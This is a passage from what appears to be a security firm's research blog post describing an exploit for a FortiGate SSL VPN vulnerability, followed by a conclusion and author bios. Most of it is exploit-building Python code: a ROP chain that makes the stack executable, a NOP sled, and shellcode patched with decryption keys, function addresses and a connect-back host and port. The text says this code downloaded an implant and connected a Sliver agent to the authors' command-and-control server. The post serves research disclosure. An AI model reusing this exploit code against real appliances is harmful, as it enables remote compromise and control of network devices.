rop.add_immediate(MEM_LEN) 
 
rop.add_gadget("pop rdx; ret;") 
rop.add_immediate(PROT_RWX) 
 
rop.add_gadget("pop rax; ret;") 
rop.add_gadget("mprotect") 
 
rop.add_gadget("jmp rax;") 
 
# Stage 7 - NOP/RET sled, then JMP to stack address. 
# At this point our ROP payload/stack is executable. Shellcode follows. 
rop.add_gadget("ret;", 8) 
rop.add_gadget("jmp rsp;")  
rop.add_immediate(0x9090909090909090, 8) 
 
# build and convert the shellcode 
#run( [ 'as', '-o', 'shellcode.o', 'shellcode.s' ], check=True ) 
result = run("objdump -d -M intel shellcode.o |egrep '^...[a-z0-9]:' |cut -c 7-28|tr -d '\\n'|tr -d ' '|tr -d '\\t'|xxd -r -p", shell=True, capture_output=True) 
shellcode = result.stdout 
 
# patch in the relevant AES key for payload decryption 
shellcode = shellcode.replace(b"00000000", self.AES_key[0:8]) 
shellcode = shellcode.replace(b"11111111", self.AES_key[8:17]) 
 
# we need to know the real length of the payload file before padding 
shellcode = shellcode.replace(b"22222222", struct.pack("<Q", self.payload_length)) 
 
# fix up GOT function addresses in the shellcode 
shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key"))) 
shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt"))) 
shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc"))) 
 
# patch in the model # of the device we're brute-forcing so that the ping-back tells us  
# which payload worked 
null_len = 8 - len(hw_version) # assumption breaks if strlen(hw_version) > 7 
patch = hw_version + "\x00"*null_len 
shellcode = shellcode.replace(b"88888888", patch.encode()) 
 
# patch in the operator's IP 
shellcode = shellcode.replace(b"XXXXXX", struct.pack(">H", self.connectBackPort ) + self.ip_as_bytes(self.connectBackHost)) 
 
# shellcode gets tacked onto the end of the 8-byte NOP sled 
rop.add_bytes(shellcode)         
 
# sprinkle liberally with 4MB of padding 
rop.add_padding(PADDING_LEN) 
req += rop.bytes()

You can see that we tried to make it simple to build the ROP chain using methods like add_gadget and add_immediate that make it easy to add ROP gadgets and 8-byte little-endian byte order immediate values.

The general gist of this code is that the buffer req is populated with:

  • HTTP request
  • HTTP POST body containing the trigger for the exploit (malicious Content-Length header)
  • New function pointer address that points at our stack pivot gadget
  • ROP chain
  • Shellcode

Having completed the exploit payload, we sent the req buffer to the SSL VPN's HTTP service. This triggered the bug immediately, causing the service to run the shellcode, download the implant, and connect the Sliver agent to our C&C infrastructure.

Conclusion

We hope this blog offers a unique perspective that shares the rough outlines of how to create an exploit for a single software/hardware version of FortiGate. Our goal is to add deeper layers of analysis to the existing resources in the security community that are mentioned above.  We look forward to sharing additional analysis techniques from continued discovery efforts against FortiGate security appliances in the future. 

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


About the author, Carl Livitt

Bishop Fox Alumnus

Carl Livitt is a Bishop Fox alumnus. He was a Principal Researcher at Bishop Fox with decades of experience in mobile and application security, hardware and embedded devices, reverse engineering, and global-scale penetration testing.

Carl is credited with the discovery of many vulnerabilities within both commercial and open-source software. He was brought in as a third-party expert to lead the team that confirmed several security issues with St. Jude Medical implantable devices. His work eventually led to an official communication from the FDA.

Carl has served as a contributing author to Hacking Exposed Web Applications 3rd Edition as well as a technical advisor for Network Security Assessment 1st Edition. He has been interviewed on NPR and quoted in publications including USA Today and eWeek. Carl co-authored the iOS reverse engineering framework iSpy, which was featured at Black Hat USA's Tools Arsenal.

More by Carl

About the author, Jon Williams

Senior Security Engineer

As a researcher for the Bishop Fox Capability Development team, Jon spends his time hunting for vulnerabilities and writing exploits for software on our customers' attack surface. He previously served as an organizer for BSides Connecticut for four years and most recently completed the Corelan Advanced Windows Exploit Development course. Jon has presented talks and written articles about his security research on various subjects, including enterprise wireless network attacks, bypassing network access controls, and malware reverse engineering.

More by Jon

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.